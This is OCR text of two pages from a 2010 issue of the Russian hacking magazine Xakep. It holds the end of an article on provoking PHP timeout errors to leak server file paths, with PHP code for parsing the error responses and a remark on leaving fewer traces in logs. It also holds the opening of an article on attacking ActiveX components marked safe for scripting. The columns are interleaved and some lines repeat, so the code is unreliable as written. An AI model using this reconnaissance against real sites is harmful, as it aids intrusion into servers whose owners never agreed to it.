Можно рассчитывать на то, что обильное количество созданных директорий будет увеличивать время выполнения скрипта загрузки аватара. Проверить это можно простым запросом Multipart, запущенным в несколько потоков. Опять-таки, проверяем на аномалии по длине и времени ответа, сохраняя такие результаты в файлы. Запустив такой алгоритм в 20 потоков, я получил файлы, отличающиеся по длине.

РАЗБИРАЕМ РЕЗУЛЬТАТЫ

По завершении отлова заветных ответов дело остается за малым — аккуратно разобрать их, вычленить пути из сообщений об ошибках и расположить по уровням в зависимости от длины ответа. Это решается примерно таким кодом:

function parseResults($dir)

{

if (is_dir($dir))

{

if ($dh = opendir($dir))

{

$i=0;

$results = array();

while (($file = readdir($dh)) !== false)

{

$curFile = $dir.$file;

$fh = fopen($curFile, 'r');

$filedata = fread($fh, filesize($curFile)); $fsize = filesize($curFile);

$p1 = strpos($filedata,"Maximum execution time of "); if ($p1 === false) {}

else{

$p2 = $p1+52;

$p3 = strpos($filedata,"</b>",$p2); if ($p3 === false) {}

else{

$len = $p3-$p2;

$path = substr($filedata,$p2,$len); $unique = true;

//Проверяем на уникальность

foreach($results as $key=>$value){ if ($value['path']==$path){

$unique=false; break;

}

if ($unique){ $len = $p3-$p2;

$res = array('path'=> substr($filedata,$p2,$len),'len'=>$fsize);

$results[$i]=$res; $i++;

}

fclose($fh);

}

closedir($dh); $size=count($results)-1; //Сортируем результаты по длине for ($i = $size; $i>=0; $i--) {

for ($j = 0; $j<=($i-1); $j++)

if ($results[$j]['len']>$results[$j+1]['len']) { $k = $results[$j];

$results[$j] = $results[$j+1]; $results[$j+1] = $k;

}

return $results;

}

На выходе получаем отсортированный массив с длинами ответов и именами скриптов, в которых возникла ошибка. Самое приятное — можно восстановить хоть весь стек, только это займет значительное время. К слову, на своей виртуалке я наловил 126 классов за 30 минут. Остается оформить отчет по уровням иерархии в красивом формате. Собственно, все это внутри PoC и содержится — пользуйся на здоровье!

ЗАКЛЮЧЕНИЕ

Это конечно не все возможные варианты получения информации через провокацию ошибок. Существует еще множество вариантов, методик и техник, применимых как для конкретных сайтов, так и для движков целиком. Все эти техники, приемы и методы предстоит еще найти и использовать, публиковать и модернизировать. Есть и множество проблем — например, оптимизировать PoC для уменьшения количества запросов и уменьшения следов в логах. Эта статья преследовала цель показа основ техники. Надеюсь, получилось. Как всегда, отвечаю в блоге на вопросы.z

XÀÊÅÐ 04 /135/ 10

057

hang

NOW!

BUY

w Click

-xcha

ВЗЛОМ

Синцов Алексей aka Don_Huan dookie@inbox.ru

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ГЛУМИМСЯ НАД объектами

ВЗЛОМ ACTIVEX

Тема уязвимостей в ActiveX-компонентах уже не нова. Она стала популярна в 2006 году, когда стала понятна истинная угроза от использования браузерных надстроек. Технология ActiveX является развитием COM-технологий Microsoft и, по сути, представляет собой библиотеку DLL или OLE-модуль с расширением OCX, и который

устанавливается пользователем в составе какоголибо ПО, которое, конечно, можно взломать.

БЕЗОПАСНОСТЬ	проверяющий, помечен ли вызываемый
Для инициализации объекта из установ-	компонент как безопасный, разрешено ли
ленных библиотек может использоваться	вызывать его методы и задавать свойства
HTMLтэг <object …>, в котором указывается	и разрешено ли ему вообще запускаться
идентификатор класса — CLSID. Кроме того,	из браузера. Если, к примеру, компонент не
можно использовать JavaScript-конструктор	помечен как безопасный, то ActiveX не будет
ActiveXObject(..), в таком случае указывается	загружен или, в зависимости от настроек
идентификатор программы — ProgID. CLSID	безопасности браузера, пользователю будет
представляет собой глобальный и уникальный	задан соответствующий вопрос. Это, в
идентификатор вида {11111111-2222-3333-	принципе здравое решение, только вот при-
4444-555555555555}. ProgID — строковый иден-	нимает его разработчик компонента. Отсюда
тификатор компоненты, по сути, ссылающийся	логика — удобно ведь, когда все работает
на CLSID. Все CLSID, ProgID и прочие настрой-	тихо и мирно — без вопросов. Поэтому мно-	нам о том, что наш компонент помечен как
ки для COM-объектов хранятся в реестре.	жество ActiveX-компонентов необоснованно	безопасный для инициализации и для скрип-
Из этого краткого введения можно понять	помечены как безопасные, и для инициали-	тинга.
суть атак: злоумышленник создает HTML-	зации, и для вызова методов. Собственно
страничку с инициализацией уязвимого	сами параметры безопасности прописываются	{7DD95802-9882-11CF-9FA9-
ActiveX компонента, вывешивает эту страничку	в реестре. Допустим, у нас имеется ActiveX-	00AA006C42C4} — Объект можно ини-
на порносайт (вариантов реализации масса:	элемент с CLSID {11111111-2222-3333-4444-	циализировать
можно использовать XSS или встроить такой	555555555555}. Чтобы проверить настройки	{7DD95801-9882-11CF-9FA9-
HTML-код в невидимый фрейм взломанного	безопасности этого компонентов, достаточно	00AA006C42C4} — Можно вызывать
сайта и т.д.), после чего заманивает жертву на	найти в реестре ключ — HKEY_CLASSES_	методы и задавать свойства
уязвимую страничку. Если у зашедшего на сайт	ROOT\CLSID\{11111111-2222-3333-4444-
уязвимую страничку. Если у зашедшего на сайт	ROOT\CLSID\{11111111-2222-3333-4444-
пользователя установлена уязвимая версия	555555555555} и рассмотреть его дочерние	Кроме того, компонент может быть вообще
эксплуатируемого компонента, то срабатывает	ключи в разделе Implemented Categories (если	запрещен для использования в браузере. Это
эксплойт со всеми вытекающими последстви-	таковой вообще существует, если нет, значит	определяется наличием, так называемого,
ями. Но не все так просто: для обеспечения	объект не помечен как безопасный в реестре).	KillBit’а. Проверить наличие этого чудо-бита
безопасности клиента был создан механизм,	Наличие следующих ключей будет говорить	можно также в реестре — HKEY_LOCAL_

058	XÀÊÅÐ 04 /135/ 10

<<< < Предыдущая 1 2 3 4 56 / 156 7 8 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202417.96 Mб12130_Optimized.pdf
#
20.04.202417.2 Mб12131_Optimized.pdf
#
20.04.202410.05 Mб12132_Optimized.pdf
#
20.04.202415.19 Mб12133_Optimized.pdf
#
20.04.202415.82 Mб12134_Optimized.pdf
#
20.04.202415.43 Mб12135_Optimized.pdf
#
20.04.202416.32 Mб12136_Optimized.pdf
#
20.04.202416.48 Mб12137_Optimized.pdf
#
20.04.202411.38 Mб12138_Optimized.pdf
#
20.04.202414.93 Mб12139_Optimized.pdf
#
20.04.202421.22 Mб12140_Optimized.pdf